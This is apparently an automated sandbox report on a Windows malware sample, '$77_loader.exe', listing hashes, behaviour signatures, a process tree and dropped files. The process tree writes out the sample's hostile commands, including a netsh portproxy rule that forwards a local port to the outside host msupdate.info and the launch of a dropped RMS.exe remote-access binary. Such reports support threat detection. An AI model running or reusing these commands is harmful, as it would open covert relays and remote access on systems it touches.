Analysis

  • max time kernel
    145s
  • max time network
    146s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220414-en
  • submitted
    03-05-2022 11:43

General

  • Target

    $77_loader.exe

  • Size

    397KB

  • MD5

    aff57ee1a4f3731c2036046910f78fb4

  • SHA1

    ef9627c0cadff85a3dfaab6aef0b7c885f03b186

  • SHA256

    3826953ded758361f9783d67242e4ba87092d637d72bcf81c649e52665c57de4

  • SHA512

    5ae93c6dae61782a7ac2fa2079df7006e0655d73e32fd7df1a5c1d44e47fd7dd2da225ea6f93e9d3dcb09be5f84b5dab2130bb4f2d5b0e05d95e866ebde0163f

Score
8/10

Malware Config

Signatures

  • Downloads MZ/PE file
  • Executes dropped EXE 1 IoCs
  • Sets file execution options in registry 2 TTPs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Modifies WinLogon 2 TTPs 3 IoCs
  • Modifies powershell logging option 1 TTPs
  • Drops file in Windows directory 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Gathers network information 2 TTPs 3 IoCs

    Uses commandline utility to view network configuration.

  • Suspicious behavior: EnumeratesProcesses 8 IoCs
  • Suspicious use of AdjustPrivilegeToken 5 IoCs
  • Suspicious use of WriteProcessMemory 27 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\$77_loader.exe
    "C:\Users\Admin\AppData\Local\Temp\$77_loader.exe"
    1⤵
    • Checks computer location settings
    • Modifies WinLogon
    • Drops file in Windows directory
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:924
    • C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe
      "C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\0coomqsh.cmdline"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:3280
      • C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe
        C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES84F5.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC84F4.tmp"
        3⤵
          PID:2412
      • C:\Windows\system32\chcp.com
        "C:\Windows\system32\chcp.com" 437
        2⤵
          PID:2876
        • C:\Windows\system32\netsh.exe
          "C:\Windows\system32\netsh.exe" interface portproxy show all
          2⤵
            PID:4276
          • C:\Windows\system32\NETSTAT.EXE
            "C:\Windows\system32\NETSTAT.EXE" -na
            2⤵
            • Gathers network information
            • Suspicious use of AdjustPrivilegeToken
            PID:4460
          • C:\Windows\system32\NETSTAT.EXE
            "C:\Windows\system32\NETSTAT.EXE" -na
            2⤵
            • Gathers network information
            • Suspicious use of AdjustPrivilegeToken
            PID:3216
          • C:\Windows\system32\NETSTAT.EXE
            "C:\Windows\system32\NETSTAT.EXE" -na
            2⤵
            • Gathers network information
            • Suspicious use of AdjustPrivilegeToken
            PID:3348
          • C:\Windows\system32\netsh.exe
            "C:\Windows\system32\netsh.exe" interface portproxy reset
            2⤵
              PID:1700
            • C:\Windows\system32\netsh.exe
              "C:\Windows\system32\netsh.exe" interface portproxy show all
              2⤵
                PID:3132
              • C:\Windows\system32\netsh.exe
                "C:\Windows\system32\netsh.exe" interface portproxy add v4tov4 listenport=757 connectport=80 connectaddress=msupdate.info
                2⤵
                  PID:3312
                • C:\Windows\system32\netsh.exe
                  "C:\Windows\system32\netsh.exe" interface portproxy show all
                  2⤵
                    PID:2808
                  • C:\Windows\system32\netsh.exe
                    "C:\Windows\system32\netsh.exe" interface portproxy show all
                    2⤵
                      PID:3744
                    • C:\Users\Admin\AppData\Local\Temp\RMS.exe
                      "C:\Users\Admin\AppData\Local\Temp\RMS.exe"
                      2⤵
                      • Executes dropped EXE
                      PID:2004
                  • C:\Windows\system32\msiexec.exe
                    C:\Windows\system32\msiexec.exe /V
                    1⤵
                    • Suspicious use of AdjustPrivilegeToken
                    PID:3572

                  Network

                  MITRE ATT&CK Enterprise v6

                  Replay Monitor

                  Loading Replay Monitor...

                  Downloads

                  • C:\Users\Admin\AppData\Local\Temp\0coomqsh.dll

                    Filesize

                    3KB

                    MD5

                    6621e21b1f79d57fea5b7f660526cc0d

                    SHA1

                    5c1951409c8a761be7de78391ace2f7fbc972c3a

                    SHA256

                    279b9fb0494206b6562f826998ca6f2b5af552d84c142686936992c745aaae5b

                    SHA512

                    059a22049966c4562a87e8bd1145381f11110f396569823aae6ac42f96e9e03f2125eed3a062c06332dfac893990ddde73d3919f07975293c4f35aaa15f08da4

                  • C:\Users\Admin\AppData\Local\Temp\0coomqsh.pdb

                    Filesize

                    11KB

                    MD5

                    c91fc1037127f6b80d0bd8214100d8a1

                    SHA1

                    54f0e018a94ba3394fdc0d0d7ae1266c1fa2b4ec

                    SHA256

                    81eda64e81398b2e2aa3c10f9512df43f97bbb4eff244316affc64544346d5eb

                    SHA512

                    8ed342be209b892297c5f89fa6e0866b72ae9bda20220758b26dc9ad97382135a3e105801070fbf9638851b5d47556827ca912109d5bf22d7948f3c7a08c7a1d

                  • C:\Users\Admin\AppData\Local\Temp\RES84F5.tmp

                    Filesize

                    1KB

                    MD5

                    c666d634ada8f4e17b7ea27c58c45d43

                    SHA1

                    be0d200ce987774c64d211d1933bcfa59d422b06

                    SHA256

                    81c8b1585aa586f7a713c6379c627731040ebd6548dd95d6226c4293b4a41512

                    SHA512

                    4d0a5542d0b8ab822a592a215f50efa51d9af892deaef45566922e9754ecb36e85d4464a1b7f475f94cc70f765601a94759ab2a4ccc96537921c71480c2b260a

                  • C:\Users\Admin\AppData\Local\Temp\RMS.exe

                    Filesize

                    8.3MB

                    MD5

                    73f351beae5c881fafe36f42cde9a47c

                    SHA1

                    dc1425cfd5569bd59f5d56432df875b59da9300b

                    SHA256

                    a028816d9741540c6184091b4ae3c4e42b104f90fe3b17a55d0e4aa4c4c43824

                    SHA512

                    f484b1260e73b3717603cfcfd62e820502480d8be57a7570e6c38612c9ea86b9335c6a42742fbdb369a37fcd5ec4c2b06f426a075582c39639128ad7be92da66

                  • C:\Users\Admin\AppData\Local\Temp\RMS.exe

                    Filesize

                    8.3MB

                    MD5

                    73f351beae5c881fafe36f42cde9a47c

                    SHA1

                    dc1425cfd5569bd59f5d56432df875b59da9300b

                    SHA256

                    a028816d9741540c6184091b4ae3c4e42b104f90fe3b17a55d0e4aa4c4c43824

                    SHA512

                    f484b1260e73b3717603cfcfd62e820502480d8be57a7570e6c38612c9ea86b9335c6a42742fbdb369a37fcd5ec4c2b06f426a075582c39639128ad7be92da66

                  • \??\c:\Users\Admin\AppData\Local\Temp\0coomqsh.0.cs

                    Filesize

                    447B

                    MD5

                    1640a04633fee0dfdc7e22c4f4063bf6

                    SHA1

                    3cb525c47b5dd37f8ee45b034c9452265fba5476

                    SHA256

                    55e16d2ca3e65ce6c62cd5be2af5d7264445c5d7e1b5f3be7149acfb47ae42a0

                    SHA512

                    85c5103dda738d6003d39b0b619e68942965ddb9d6e08e544abf377224fdb29c6cd1501a549e99e57875954cea44b5bdefd7cace018c8123e7bfb717ae0e973d

                  • \??\c:\Users\Admin\AppData\Local\Temp\0coomqsh.cmdline

                    Filesize

                    309B

                    MD5

                    d857d70711643aaf2282e7c220530081

                    SHA1

                    8f783c6b233e7675a9a6633d5ed5f44bcc5d0779

                    SHA256

                    042f78299f09cb6b4de318cf9c2a2758606eff5bebd25d4c2fd388d3ac03f309

                    SHA512

                    0b0603ba42bb86466c95b37dd1a0657d646dbcfe741ff7223cf6cc54a73efa307a3c49030b06c2d8727151e353ed7c98784ccfe23e88e5f444606ae5d04277af

                  • \??\c:\Users\Admin\AppData\Local\Temp\CSC84F4.tmp

                    Filesize

                    652B

                    MD5

                    1f555cf55bef11bc4dc295f80e6a3e29

                    SHA1

                    9538a4734ecc52ac3f89b0e4411d4c61c7ae7473

                    SHA256

                    0f53e2cfd88c6138e5784731871ef605dbc32a750c43aad3604d16ee44fe991c

                    SHA512

                    cec2e94d0662b7ac497f104a11ccfe9bdfa70f0b89affbda8dc109633154a7a1e33424c48ac42c4bfb701e1df5bbf40765c1f91711e378332046c356add88928

                  • memory/924-130-0x000000001BB50000-0x000000001C6AD000-memory.dmp

                    Filesize

                    11.4MB

                  • memory/1700-144-0x0000000000000000-mapping.dmp

                  • memory/2004-149-0x0000000000000000-mapping.dmp

                  • memory/2412-134-0x0000000000000000-mapping.dmp

                  • memory/2808-147-0x0000000000000000-mapping.dmp

                  • memory/2876-139-0x0000000000000000-mapping.dmp

                  • memory/3132-145-0x0000000000000000-mapping.dmp

                  • memory/3216-142-0x0000000000000000-mapping.dmp

                  • memory/3280-131-0x0000000000000000-mapping.dmp

                  • memory/3312-146-0x0000000000000000-mapping.dmp

                  • memory/3348-143-0x0000000000000000-mapping.dmp

                  • memory/3744-148-0x0000000000000000-mapping.dmp

                  • memory/4276-140-0x0000000000000000-mapping.dmp

                  • memory/4460-141-0x0000000000000000-mapping.dmp